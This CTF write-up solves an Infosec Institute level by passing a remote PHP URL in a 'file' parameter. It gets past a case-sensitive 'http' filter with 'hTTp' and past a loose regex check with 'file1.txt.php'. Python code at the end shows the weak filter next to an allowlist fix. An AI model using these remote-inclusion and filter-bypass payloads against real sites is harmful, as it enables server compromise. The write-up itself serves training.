Vulnerability: A4 Insecure Direct Object References
Write-up
For almost all levels I will be using Burp Suite. Burp Suite is an interception proxy that lets us intercept and modify the HTTP requests and responses exchanged between the browser and the web server.
This time we are presented with a web page that has 3 links, ‘Bio’, ‘Clients’ and ‘About’. Each link embeds a text file into the page, ‘file1.txt’, ‘file2.txt’ and ‘file3.txt’ respectively. The URL parameter is ‘file’, taking one of the text filenames as its value:
http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=file1.txt
http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=file2.txt
http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=file3.txt
Let's try substituting the included text file with a PHP file hosted at http://infosecinstitute.com, using the following URL:
http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=http://infosecinstitute.com/index.php
Unfortunately, we hit a filter.
We can bypass it by using some capital characters in the ‘http’ keyword, like so:
http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=hTTp://infosecinstitute.com/index.php
It looks like the filter was case-sensitive, so we were able to bypass it; however, now it doesn’t like the file extension.
One trick to circumvent this is to insert a null byte (%00 URL-encoded), but this time it did not work. After some trial and error I saw the second hint, stating that there’s a regular-expression restriction, so I changed the filename from index.php to ‘file1.txt’ with a ‘.php’ extension and successfully completed the level:
http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=hTTp://infosecinstitute.com/file1.txt.php
If I had to guess, their regular-expression restriction could be looking for one of the 3 ‘permitted’ filenames, ‘file1.txt’, ‘file2.txt’ and ‘file3.txt’, when loading a file into the page.
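As an added illustration (not code from this write-up or from the CTF's own source), the Python below models a blacklist-style filter with the two weaknesses the level exhibited, a case-sensitive ‘http’ prefix check and an unanchored regular expression, beside the exact-match allowlist that closes both gaps. The filter logic and the BASE_DIR path are assumptions constructed for the example.

```python
import os
import re

# The only three files the page is meant to include.
PERMITTED = {"file1.txt", "file2.txt", "file3.txt"}
# Constructed example path; not the CTF's real directory layout.
BASE_DIR = "/var/www/ctf2/exercises"


def weak_filter(file_param: str) -> bool:
    """Assumed reconstruction of a blacklist check consistent with the
    behaviour observed in the level. Returns True when the value is accepted."""
    # Case-sensitive prefix check: 'hTTp://...' is not caught.
    if file_param.startswith("http://"):
        return False
    # re.search is unanchored, so 'file1.txt' anywhere in the value satisfies
    # it, including as part of '.../file1.txt.php'.
    if not re.search(r"file[123]\.txt", file_param):
        return False
    return True


def strict_filter(file_param: str) -> bool:
    """Allowlist check: the value must be exactly one of the permitted names,
    so schemes, directory components and extra extensions are all rejected."""
    return file_param in PERMITTED


def resolve_include(file_param: str):
    """Map a permitted name to a path under BASE_DIR; None for anything else.
    Only allowlisted names ever reach the filesystem join."""
    if not strict_filter(file_param):
        return None
    return os.path.join(BASE_DIR, file_param)
```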